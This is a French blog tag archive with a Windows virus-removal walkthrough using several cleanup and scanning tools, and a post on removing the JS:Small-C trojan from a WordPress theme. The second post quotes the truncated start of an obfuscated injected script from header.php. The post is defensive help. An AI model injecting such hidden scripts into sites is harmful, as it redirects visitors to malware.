trojan tag archives

Traquer éradiquer les virus

Preparation du PC

1- TFC (Temp File Cleaner)DownloadHomepage

Cela va supprimer les fichiers inutiles temporaires de votre système, et vous faire gagner du temps. De nombreuses infections sont chargées à partir d’un emplacement de fichier temporaire.
* Télécharger TFC sur votre bureau, ou tout autre emplacement.
* Enregistrer tout travail non enregistré. TFC va fermer toutes les fenêtres de l’application ouverte.
* TFC.exe Double-cliquez pour exécuter le programme.
* Si vous y êtes invité, cliquer sur « Oui » pour redémarrer.
Enregistrezrvotre travail. TFC va se fermer automatiquement tous les programmes ouverts, le laisser fonctionner sans interruption. Il ne devrait pas prendre plus de temps que quelques minutes. Si nécessaire vous devrez redémarrer.

2- ERUNTDownloadHomepage

Pour garantir que nous avons une sauvegarde du Registre en cours de validité. ERUNT (Emergency Recovery Utility NT) vous permet de stocker une sauvegarde complète de votre base de registre et de restaurer si nécessaire. Le retrait d’ infections par logiciels malveillants nécessite souvent d’apporter des modifications au Registre, et une base de registre corrompue peut empêcher un système de démarrer. Compatible avec Windows NT, 2000, 2003, XP, Vista, versions 32 et 64-bit.

Télécharger ERUNT *

* Erunt_setup.exe Double-cliquez sur Exécuter.

* Suivez les instructions et les installer en utilisant la configuration par défaut (la langue d’installation, l’emplacement d’installation, raccourcis …).

* Non à la partie qui vous demande d’ajouter ERUNT dans le dossier de démarrage, si vous le souhaitez, vous pouvez activer cette option plus tard.

# Début ERUNT

# Choisissez un emplacement pour la sauvegarde

L’emplacement par défaut C: \ WINDOWS \ ERDNT \ [] date d’aujourd’hui de préférence

* Les deux premières cases sont cochées par défaut (système de registre et le registre de l’utilisateur actuel).

Appuyez sur OK *

* Lorsque vous y êtes invité, cliquez sur OUI pour créer un nouveau dossier.

* Barres de progression affiche l’état de sauvegarde.

* Une fenêtre de confirmation apparaîtra lorsque vous avez terminé. Cliquez sur OK pour fermer.

CHASSER ERADIQUER

3 -MALWAREBYTES pour chasser les malware Spyware/Adware :

  • Télécharger Malwarebytes’ Anti-Malware (MBAM) sur le Bureau.
  • Double-cliquer sur le fichier téléchargé pour lancer le processus d’installation.
  • Dans l’onglet Mise à jour, cliquer sur le bouton Recherche de mise à jour : si le pare-feu demande l’autorisation à MBAM de se connecter à Internet, accepter.
  • Une fois la mise à jour terminée, aller dans l’onglet Recherche.
  • Sélectionner Exécuter un examen rapide.
  • Cliquer sur Rechercher. L’analyse démarre.
  • A la fin de l’analyse, un message s’affiche :
Citation :

L’examen s’est terminé normalement. Cliquez sur ‘Afficher les résultats’ pour afficher tous les objets trouvés.

  • Cliquer sur OK pour poursuivre. Si MBAM n’a rien trouvé, il le dira aussi.
  • Fermer les navigateurs.
  • Si des malwares ont été détectés, cliquer sur Afficher les résultats.
  • Sélectionner tout (ou laisser coché) et cliquer sur Supprimer la sélection, MBAM va détruire les fichiers et clés de registre infectés et en mettre une copie dans la quarantaine.
  • MBAM va ouvrir le Bloc-notes et y copier le rapport d’analyse.

4- Recherche de ROOTKIT

GMER Rootkit ScannerDownloadHomepage

Les rootkits peuvent généralement être éliminée efficacement, mais ils doivent être retirés avant tout autre malware , et parfois interférer avec certains des outils.

* Extraire le contenu du fichier compressé sur le bureau.

* Double-cliquez sur GMER.exe.

# Si cela vous donne un avertissement sur l’activité rootkit et vous demande si vous voulez exécuter une analyse complète … cliquez sur NON, puis utilisez les paramètres suivants pour une analyse plus complète ..

# Dans le panneau de droite, vous verrez plusieurs cases qui ont été vérifiées. Vérifiez les éléments suivants ne sont pas cochées …

* API / EAT

* Disques / partition autre que Systemdrive (généralement C: \)

* Montrer tout (ne manquez pas celui-ci)

* Ensuite, cliquez sur le bouton Scan & attendre qu’il ait fini.

* Une fois terminé, cliquez sur le bouton [Enregistrer ..], et dans la zone Nom du fichier, tapez « ark.txt »

* Enregistrer le journal où vous pouvez facilement trouver, tel que votre bureau.

** Attention **

Rootkit scans souvent produit des faux positifs. NE PAS prendre des mesures sur tous les rootkit

5- Rechercher scanner votre PC avec OTL :

  • Télécharger OTL (de OldTimer) sur votre Bureau.
  • Double-cliquer sur OTL pour le lancer.

(Sous Vista, il faut cliquer droit sur OTL et choisir Exécuter en tant qu’administrateur)

  • Une fenêtre apparaît. Dans la section Output en haut de cette fenêtre, cocher Minimal Output.
  • Cocher également les cases à côté de LOP Check et Purity Check.
  • Enfin, cliquer sur le bouton Run Scan. Le scan ne prendra pas beaucoup de temps.
  • Une fois l’analyse terminée, deux fenêtres vont s’ouvrir dans le Bloc-notes : OTL.txt et Extras.txt. Ils se trouvent au même endroit que OTL (donc par défaut sur le Bureau).

– Pour éradiquer les virus quelques outils :

5-1 Navilog1 est un outil dédié aux infections egdaccess/navipromo/instant access/Magic.control Agent.

  • Double-cliquer sur Navilog1.exe afin de lancer l’installation.
  • Puis double-cliquer sur Navilog1 présent sur le Bureau.

(Sous Vista, cliquer droit sur le raccourci de Navilog1 et choisir Exécuter en tant qu’administrateur)

  • Appuiyer sur F ou f puis valider par Entrée.
  • Appuyer sur une touche clavier à chaque fois que cela est demandé, et on arrive au menu des options.
  • Choisir l’option 1 et appuyer sur la touche Entrée pour valider son choix.
  • Patienter le temps du scan. Il sera peut-être demandé de redémarrer le PC.
  • Patienter jusqu’au message : *** Scan terminé le ….. ***
  • Si le résultat du scan ne s’affiche pas, on le trouvera dans C:\cleannavi.txt

5-2 Pour traiter les  infections Lop/CiD/Trojan Swizzor

  • Télécharger Lop.sd sur le Bureau.
  • Double-cliquer dessus pour lancer l’installation.
  • Puis double-cliquer sur le raccourci Lop S&D présent sur le Bureau.

(Sous Vista, il faut cliquer droit sur le raccourci Lop S&D et choisir Exécuter en tant qu’administrateur)

  • Sélectionner la langue souhaitée, puis choisir l’option 1 (Recherche) .
  • Patienter jusqu’à la fin du scan.
  • Le rapport généré (C:\lopR.txt).

Puis :

  • Relancer Lop S&D.

(Sous Vista, il faut cliquer droit sur le raccourci Lop S&D et choisir Exécuter en tant qu’administrateur)

  • Choisir cette fois-ci l’option 2 (Suppression).
  • Ne fermer pas la fenêtre lors de la suppression !
  • Le rapport généré (C:\lopR.txt).

Divers outils :

Scan antivirus en ligne Kaspersky

Deux outils gratuits à recommander :
SpywareBlaster contre les spyware
Malwarebytes
A lancer chaque semaine.

N.B Evitez d’avoir plusieurs anti-virus

système     Étiquettes : , ,

Virus Trojan JS:Small-C [Trj] sur WordPress

Ce blog vient d’être attaqué par un virus Trojan :  JS:Small-C [Trj]

Mon anti-virus m’a indiqué qu’il y avait un virus sur favicon.ico

Si vous avez le même type de message sur votre Blog WordPress voici la procédure pour s’en débarrasser.

Tout d’abord : Don’t panic!

Ce trojan renvoie sur un site chinois qui contient des malwares.

Editer le fichier « header.php » de votre thème, vous allez voir une ligne aprés le head du style :

<script language=javascript>document.write(unescape(‘%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%6 …

C’est un javascript masqué. Il suffit de l’effacer.

N’oubliez pas ensuite de mettre à jour votre WordPress.

web2.0     Étiquettes :